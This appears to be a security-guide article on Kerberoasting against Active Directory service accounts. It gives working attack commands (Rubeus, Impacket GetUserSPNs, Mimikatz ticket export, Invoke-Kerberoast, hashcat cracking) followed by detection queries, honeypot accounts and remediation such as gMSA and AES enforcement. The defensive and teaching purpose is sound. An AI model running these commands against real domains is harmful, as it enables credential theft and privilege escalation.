Kerberoasting Attack and Defense
Kerberoasting attack guide targeting AD service accounts. Extract and crack service tickets offline for privilege escalation and lateral movement.
Description
Kerberoasting is a post-exploitation attack technique that targets Active Directory environments by extracting and cracking Kerberos service tickets to reveal plaintext passwords of service accounts. This attack exploits a fundamental design of the Kerberos authentication protocol, where service tickets (TGS tickets) are encrypted using the password hash of the service account.
The attack is particularly effective because:
- No elevated privileges required - Any domain user can request service tickets
- Offline cracking - Extracted tickets can be cracked offline without detection
- High success rate - Service accounts often have weak or outdated passwords
- Persistent access - Compromised service accounts frequently have elevated privileges and rarely change passwords
Kerberoasting has become a staple technique in penetration testing and red team operations due to its reliability and low detection footprint.
Silent but Deadly
Kerberoasting is difficult to detect because requesting service tickets is legitimate Active Directory behavior. Attackers can extract hundreds of tickets in seconds, then crack them offline at their leisure without triggering security alerts.
Impact
- Service Account Compromise: Direct access to service account credentials, often with elevated domain privileges
- Lateral Movement: Service accounts frequently have access to multiple systems and sensitive resources
- Domain Escalation: High-privilege service accounts may lead to domain administrator compromise
- Persistence: Long-lived service accounts with infrequently changed passwords provide persistent access
- Data Exfiltration: Compromised accounts often have access to databases, file shares, and critical systems
- Compliance Violations: Unauthorized access to systems protected by regulatory requirements
- Supply Chain Risk: Compromised service accounts may access third-party integrations and cloud services
The impact is amplified when service accounts are configured with domain admin privileges or have access to critical infrastructure.
Technical Details
Kerberos Authentication Primer
To understand Kerberoasting, it's essential to grasp the Kerberos authentication flow:
- AS-REQ: User requests Ticket Granting Ticket (TGT) from Key Distribution Center (KDC)
- AS-REP: KDC returns encrypted TGT
- TGS-REQ: User requests Service Ticket (TGS) using TGT
- TGS-REP: KDC returns Service Ticket encrypted with service account's password hash
- AP-REQ: User presents Service Ticket to access service
The Kerberoasting Attack Flow
Enumerate Service Principal Names (SPNs)
Service accounts in Active Directory are identified by Service Principal Names (SPNs). Attackers enumerate these using LDAP queries:
# Using PowerShell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Using SetSPN
setspn -T domain.com -Q */*Request Service Tickets
With a valid domain account, attackers request TGS tickets for discovered SPNs:
# Using PowerShell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.domain.com:1433"Extract Tickets from Memory
Tickets are extracted from memory and saved for offline cracking:
# Using Mimikatz
mimikatz # kerberos::list /export
# Using Rubeus
Rubeus.exe kerberoast /outfile:tickets.txtOffline Password Cracking
Extracted tickets are cracked using tools like Hashcat or John the Ripper:
# Using Hashcat
hashcat -m 13100 tickets.txt wordlist.txt -r rules/best64.rule
# Using John the Ripper
john --format=krb5tgs tickets.txt --wordlist=rockyou.txtTargeted Kerberoasting
Attackers often prioritize high-value targets:
- Domain Admins: Accounts with DA privileges
- SQL Service Accounts: Frequently have sysadmin rights
- Exchange Accounts: Access to email and administrative functions
- Backup Service Accounts: Access to sensitive backup data
- Application Service Accounts: Access to business-critical systems
Common Attack Tools
Impacket Suite
# GetUserSPNs.py - Request and dump Kerberoastable accounts
GetUserSPNs.py domain.com/user:password -dc-ip 10.10.10.1 -request
# With AES encryption support
GetUserSPNs.py domain.com/user:password -dc-ip 10.10.10.1 -request -outputfile hashes.txtRubeus (C# Implementation)
# Basic Kerberoasting
Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
Rubeus.exe kerberoast /user:svc_sql /simple
# Roast AS-REPs (for accounts with "Do not require Kerberos preauthentication")
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txtPowerView (PowerSploit)
# Enumerate Kerberoastable users
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt
# Target specific OU
Get-DomainUser -SPN -SearchBase "OU=ServiceAccounts,DC=domain,DC=com" | Get-DomainSPNTicketInvoke-Kerberoast (Empire)
# Request all Kerberoastable tickets
Invoke-Kerberoast -OutputFormat John | % { $_.Hash } | Out-File -Encoding ASCII hashes.txtDetection
Kerberoasting detection requires monitoring multiple data sources and establishing behavioral baselines.
Event Log Monitoring
Event ID 4769: Kerberos Service Ticket Request
Monitor for anomalies in ticket requests:
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID=4769)]]
and
*[EventData[Data[@Name='TicketEncryptionType']='0x17']]
and
*[EventData[Data[@Name='Status']='0x0']]
</Select>
</Query>
</QueryList>Key indicators:
- High volume of TGS requests from single account (>100 in 10 minutes)
- Requests for RC4 encryption (EncryptionType: 0x17) when AES is available
- Unusual timing patterns (after-hours, rapid succession)
- Requests from non-standard workstations
Event ID 4768: Kerberos TGT Request
Track authentication patterns:
- New workstation authentications
- Unusual source IP addresses
- Service accounts authenticating interactively
Advanced Detection with SIEM
-- Splunk query for Kerberoasting detection
index=windows EventCode=4769 Ticket_Encryption_Type=0x17
| stats count by src_ip, Account_Name
| where count > 50// Azure Sentinel KQL query
SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"
| summarize RequestCount=count() by AccountName, IpAddress, bin(TimeGenerated, 10m)
| where RequestCount > 100Honeypot Service Accounts
Deploy decoy service accounts with SPNs to detect reconnaissance:
# Create honeypot service account
New-ADUser -Name "svc_honeypot_sql" -ServicePrincipalNames "MSSQLSvc/honeypot.domain.com:1433" -AccountPassword (ConvertTo-SecureString "ComplexP@ssw0rd123!" -AsPlainText -Force)
# Monitor for ANY ticket requests to this SPNAlert immediately on any authentication attempts to honeypot accounts.
Behavioral Analytics
- Baseline establishment: Track normal SPN query patterns for each user/system
- Anomaly detection: Alert on deviations from baseline (volume, timing, encryption type)
- Machine learning: Use ML models to identify suspicious ticket request patterns
- User behavior analytics (UBA): Correlate with other unusual activities (privilege escalation attempts, lateral movement)
Remediation
Immediate Response Actions
1. Identify Compromised Accounts
# Search Event Logs for suspicious TGS requests
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} |
Where-Object {$_.Properties[4].Value -eq '0x17'} |
Select-Object TimeCreated, @{N='User';E={$_.Properties[0].Value}}, @{N='Service';E={$_.Properties[1].Value}}2. Reset Service Account Passwords
# Reset compromised service account password
Set-ADAccountPassword -Identity svc_sql -NewPassword (ConvertTo-SecureString -AsPlainText "NewC0mpl3xP@ssw0rd!" -Force) -Reset
# Force password change at next logon
Set-ADUser -Identity svc_sql -ChangePasswordAtLogon $true3. Review Service Account Privileges
# Enumerate group memberships
Get-ADPrincipalGroupMembership -Identity svc_sql | Select-Object Name
# Remove unnecessary privileges
Remove-ADGroupMember -Identity "Domain Admins" -Members svc_sql -Confirm:$false4. Revoke Existing Kerberos Tickets
# On domain controller - force ticket renewal
klist purge -li 0x3e7
# Reset KRBTGT account twice (wait 24h between resets)
# This invalidates all golden ticketsLong-Term Defensive Strategies
1. Enforce Strong Service Account Passwords
Implement 25+ character passwords with high complexity:
# Generate strong random password
$Password = -join ((48..57) + (65..90) + (97..122) + (33..47) | Get-Random -Count 32 | % {[char]$_})
Set-ADAccountPassword -Identity svc_sql -NewPassword (ConvertTo-SecureString $Password -AsPlainText -Force) -Reset2. Implement Group Managed Service Accounts (gMSA)
gMSAs automatically rotate passwords and use 240-character random passwords:
# Create KDS Root Key (one-time setup)
Add-KdsRootKey -EffectiveTime ((Get-Date).AddHours(-10))
# Create gMSA
New-ADServiceAccount -Name svc_sql_gmsa -DNSHostName sql01.domain.com -PrincipalsAllowedToRetrieveManagedPassword "SQL Servers"
# Install on target server
Install-ADServiceAccount -Identity svc_sql_gmsa
# Configure service to use gMSA (no password needed)
Set-Service -Name MSSQLSERVER -StartupType Automatic -Credential "DOMAIN\svc_sql_gmsa$"3. Enable AES Encryption
Force AES encryption for Kerberos to increase cracking difficulty:
# Configure AD to support AES
Set-ADUser -Identity svc_sql -KerberosEncryptionType AES128, AES256
# Disable RC4 encryption domain-wide via GPO
# Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
# "Network security: Configure encryption types allowed for Kerberos" = AES256, AES1284. Principle of Least Privilege
# Audit service account permissions
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties MemberOf |
Select-Object Name, @{N='Groups';E={$_.MemberOf -join '; '}}
# Remove from privileged groups
Remove-ADGroupMember -Identity "Domain Admins" -Members svc_backup5. Implement Service Account Monitoring
# PowerShell script to monitor service account changes
$SPNUsers = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, PasswordLastSet
foreach ($user in $SPNUsers) {
$passwordAge = (Get-Date) - $user.PasswordLastSet
if ($passwordAge.Days -gt 90) {
Write-Warning "$($user.Name) password is $($passwordAge.Days) days old"
}
}6. Conditional Access Policies
- Restrict service account interactive logons
- Enforce network location requirements
- Implement time-based access restrictions
- Require MFA for service account password resets
Prevention Best Practices
Service Account Security Framework
1. Account Lifecycle Management
# Automated password rotation script
$ServiceAccounts = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties PasswordLastSet
foreach ($account in $ServiceAccounts) {
if ((Get-Date) - $account.PasswordLastSet -gt (New-TimeSpan -Days 60)) {
# Trigger automated password rotation
# Update dependent services
# Alert security team
}
}2. Segregation of Duties
- Separate service accounts for different services/applications
- Avoid shared service accounts across multiple systems
- Implement dedicated accounts for each privilege level
3. Regular Security Audits
# Service account security audit script
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties * |
Select-Object Name, ServicePrincipalName, PasswordLastSet, LastLogonDate,
@{N='PasswordAge';E={(Get-Date) - $_.PasswordLastSet}},
@{N='AdminCount';E={$_.AdminCount}} |
Export-Csv ServiceAccountAudit.csv -NoTypeInformation4. Network Segmentation
- Isolate systems using service accounts
- Implement micro-segmentation for critical services
- Restrict service account access to necessary network zones only
5. Monitoring and Alerting
Establish comprehensive alerting for:
- New SPN registrations
- Service account privilege changes
- Unusual authentication patterns
- Failed logon attempts
- Password changes
Verification
Validate Defensive Posture
Check for RC4 Encryption
# Identify accounts still using RC4
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties msDS-SupportedEncryptionTypes |
Where-Object {$_.'msDS-SupportedEncryptionTypes' -band 0x04} |
Select-Object Name, SamAccountNameAudit Service Account Passwords
# Check password ages
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties PasswordLastSet |
Select-Object Name, PasswordLastSet, @{N='PasswordAge';E={(Get-Date) - $_.PasswordLastSet}} |
Sort-Object PasswordAge -DescendingTest Detection Capabilities
# Controlled Kerberoasting test (with authorization)
# Using Rubeus in test environment
Rubeus.exe kerberoast /nowrap
# Verify alerts are generated in SIEM
# Confirm incident response procedures are triggeredValidate gMSA Implementation
# List all gMSAs
Get-ADServiceAccount -Filter * | Select-Object Name, DNSHostName, Enabled
# Verify automatic password rotation
Get-ADServiceAccount -Identity svc_sql_gmsa -Properties PasswordLastSet, msDS-ManagedPasswordIntervalAdvanced Considerations
Kerberoasting in Cloud Environments
Azure AD Connect Sync Accounts
Azure AD Connect synchronization accounts with SPNs are vulnerable:
# Identify Azure AD Connect sync accounts
Get-ADUser -Filter {ServicePrincipalName -like "*AAD*"} -Properties ServicePrincipalNameHybrid Environment Challenges
- Monitor both on-premises and cloud authentication
- Implement consistent password policies across environments
- Use Azure AD Privileged Identity Management (PIM)
Roasting Variations
AS-REP Roasting
Targets accounts with "Do not require Kerberos preauthentication" enabled:
# Find AS-REP roastable accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuthProtection:
# Disable "Do not require Kerberos preauthentication"
Set-ADAccountControl -Identity username -DoesNotRequirePreAuth $falsePrivileged Access Workstations (PAWs)
Implement PAWs for service account management:
- Dedicated hardened workstations for administrative tasks
- No internet access or email
- Multi-factor authentication required
- Full logging and monitoring
References
- MITRE ATT&CK: T1558.003 - Kerberoasting
- Microsoft: Mitigating Kerberoasting Attacks
- SANS: Detecting Kerberoasting Activity
- CIS Benchmark: Active Directory Security
- harmj0y's Blog: Kerberoasting Without Mimikatz
Next Steps
If Kerberoasting vulnerabilities are identified:
- Immediately assess all service accounts for weak passwords and excessive privileges
- Implement gMSAs for all compatible services within 90 days
- Deploy comprehensive monitoring for Event ID 4769 with behavioral analytics
- Conduct password audits using tools like DSInternals to identify crackable hashes
- Review related Active Directory attack techniques:
- LLMNR and NBT-NS Poisoning
- PrintNightmare
- Active Directory privilege escalation vectors
Kerberoasting remains one of the most effective post-exploitation techniques against Active Directory environments. The combination of strong passwords (25+ characters), Group Managed Service Accounts, AES encryption enforcement, and comprehensive monitoring provides defense-in-depth against this persistent threat. Make Kerberoasting prevention a priority in your Active Directory security program.
Last updated on
DnsAdmins Group Exploitation: From DNS to Domain Admin
Detailed walkthrough of DnsAdmins privilege escalation through DLL injection into DNS service, covering exploitation, cleanup, and mitigation strategies.
NTLM Relay Attacks: Modern Lateral Movement Techniques
In-depth exploration of Net-NTLMv2 relay attacks for lateral movement and privilege escalation, including SMB and LDAP relay scenarios with Responder and ntlmrelayx.